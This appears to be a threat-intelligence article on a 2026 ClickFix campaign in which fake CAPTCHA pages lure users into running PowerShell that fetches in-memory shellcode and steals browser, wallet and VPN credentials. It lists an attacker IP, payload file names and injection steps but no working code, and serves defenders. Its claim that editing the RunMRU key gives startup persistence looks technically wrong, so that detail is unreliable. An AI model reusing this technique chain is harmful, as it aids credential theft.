ClickFix Infostealer Campaign Exploits Fake CAPTCHA to Deploy Malware
A sophisticated malware campaign has emerged, utilizing deceptive CAPTCHA verifications to trick users into executing malicious commands, leading to the deployment of an advanced information-stealing malware. This campaign, identified in early 2026, exhibits significant similarities to the ClickFix attacks that previously targeted restaurant reservation systems in July 2025. The attackers have refined their social engineering tactics to effectively bypass traditional security measures and gain initial access to victim systems.
Attack Methodology
The attack begins when a user visits a compromised website that displays a fake CAPTCHA verification page. This page deceives the victim into copying a malicious PowerShell command to their clipboard and executing it manually. This ClickFix technique exploits human interaction to evade automated security sandboxes, which typically analyze file downloads rather than manual command executions.
Once the command is executed, it initiates a download from the attacker’s infrastructure, specifically the IP address 91.92.240.219. The malware reads the clipboard via specific API calls to verify the user’s action before proceeding. This multi-stage infection process is designed to steal sensitive data from a wide range of applications, including over twenty-five web browsers, cryptocurrency wallets like MetaMask, and enterprise VPN configurations.
Process Injection and Persistence
To maintain stealth on infected devices, the malware employs advanced process injection techniques. After the initial PowerShell execution, it downloads a position-independent shellcode file named `cptch.bin` from the attacker’s infrastructure. Analysts observed an operational security error where the attacker used the variable `$finalPayload`, which was flagged by Microsoft Defender. Generated using the Donut framework, this allows the payload to execute directly in memory.
The shellcode allocates memory within benign processes like `svchost.exe` using standard Windows APIs such as `VirtualAlloc` to conceal its malicious activity. To ensure the infection survives system reboots, the attackers modify the `RunMRU` registry key. This modification forces the machine to re-execute the malicious PowerShell command upon startup, re-initiating the payload download. Additionally, the attackers rotate payload filenames, such as `cptchbuild.bin`, to bypass hash-based blocking mechanisms.
Implications and Recommendations
The impact of this campaign is severe, granting attackers access to critical credentials and financial assets. This access allows them to monetize compromised accounts or pivot deeper into corporate networks. Organizations should educate users about the risks of running commands from web pages. Security teams must monitor for unusual PowerShell execution and specific registry modifications. Implementing endpoint detection rules that flag clipboard data reading by browser processes can help identify this attack early.
